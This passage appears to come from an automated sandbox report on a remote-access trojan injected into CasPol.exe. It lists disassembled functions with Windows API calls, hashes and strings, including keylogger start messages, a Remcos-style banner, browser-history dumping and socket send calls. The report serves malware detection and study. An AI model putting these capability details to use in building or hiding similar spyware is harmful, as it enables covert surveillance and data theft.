                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                              • String ID: KeepAlive | Disabled
                                                                                                              • API String ID: 2993684571-305739064
                                                                                                              • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                                                              • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                              • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                                                              • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                              Function 00419F32 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                              • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                              • String ID: Alarm triggered
                                                                                                              • API String ID: 614609389-2816303416
                                                                                                              • Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                                                                              • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                              • Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                                                                              • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                              Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                              • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041BE86
                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041BE93
                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041BEA6
                                                                                                              Strings
                                                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                              • API String ID: 3024135584-2418719853
                                                                                                              • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                              • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                              • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                              • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                              Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                                                              • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                              • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                                                              • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                              Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00410BC4
                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 3525466593-0
                                                                                                              • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                              • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                              • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                              • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                              Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                              • String ID:
                                                                                                              • API String ID: 4269425633-0
                                                                                                              • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                                                                              • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                              • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                                                                              • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                              Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                              • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                              • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                              • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                              Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                                                                              • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                                                                              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                                                                              • __freea.LIBCMT ref: 0044FFC4
                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                              • String ID:
                                                                                                              • API String ID: 313313983-0
                                                                                                              • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                                                              • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                              • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                                                              • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                              Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                              • _free.LIBCMT ref: 0044E1A0
                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 336800556-0
                                                                                                              • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                              • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                              • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                              • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                              Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 0044F7B5
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              • _free.LIBCMT ref: 0044F7C7
                                                                                                              • _free.LIBCMT ref: 0044F7D9
                                                                                                              • _free.LIBCMT ref: 0044F7EB
                                                                                                              • _free.LIBCMT ref: 0044F7FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                              • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                              • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                              • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                              Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 00443305
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              • _free.LIBCMT ref: 00443317
                                                                                                              • _free.LIBCMT ref: 0044332A
                                                                                                              • _free.LIBCMT ref: 0044333B
                                                                                                              • _free.LIBCMT ref: 0044334C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                              • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                              • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                              • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                              Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                              • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                              • String ID: (FG
                                                                                                              • API String ID: 3142014140-2273637114
                                                                                                              • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                                              • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                              • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                                              • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                              Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                                              • _free.LIBCMT ref: 0044D5C5
                                                                                                                • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043A856
                                                                                                                • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                                                                                • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                              • String ID: *?$.
                                                                                                              • API String ID: 2812119850-3972193922
                                                                                                              • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                                                                              • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                                              • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                                                                              • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                                              Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041B6BF
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                              • String ID: XCG$`AG$>G
                                                                                                              • API String ID: 2334542088-2372832151
                                                                                                              • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                                              • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                              • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                                              • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                              Function 004426D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
                                                                                                              • _free.LIBCMT ref: 004427DF
                                                                                                              • _free.LIBCMT ref: 004427E9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$FileModuleName
                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              • API String ID: 2506810119-3657627342
                                                                                                              • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                              • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                              • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                              • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                              Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9), ref: 004176CC
                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF), ref: 004176D5
                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
                                                                                                              • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                              • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                              • API String ID: 368326130-2663660666
                                                                                                              • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                                                              • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                              • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                                                              • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                              Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread$LocalTimewsprintf
                                                                                                              • String ID: Offline Keylogger Started
                                                                                                              • API String ID: 465354869-4114347211
                                                                                                              • Opcode ID: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                                                                              • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                              • Opcode Fuzzy Hash: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                                                                              • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                              Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                                                                              • String ID: Online Keylogger Started
                                                                                                              • API String ID: 112202259-1258561607
                                                                                                              • Opcode ID: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                                                                              • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                              • Opcode Fuzzy Hash: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                                                                              • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                              Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
